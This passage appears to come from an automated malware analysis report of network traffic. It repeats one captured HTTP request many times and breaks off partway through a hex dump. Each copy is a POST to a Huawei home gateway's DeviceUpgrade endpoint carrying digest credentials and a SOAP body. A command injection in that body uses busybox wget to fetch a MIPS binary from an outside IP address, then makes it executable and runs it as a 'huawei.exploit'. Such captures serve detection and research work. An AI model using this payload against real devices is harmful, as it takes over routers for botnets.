xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 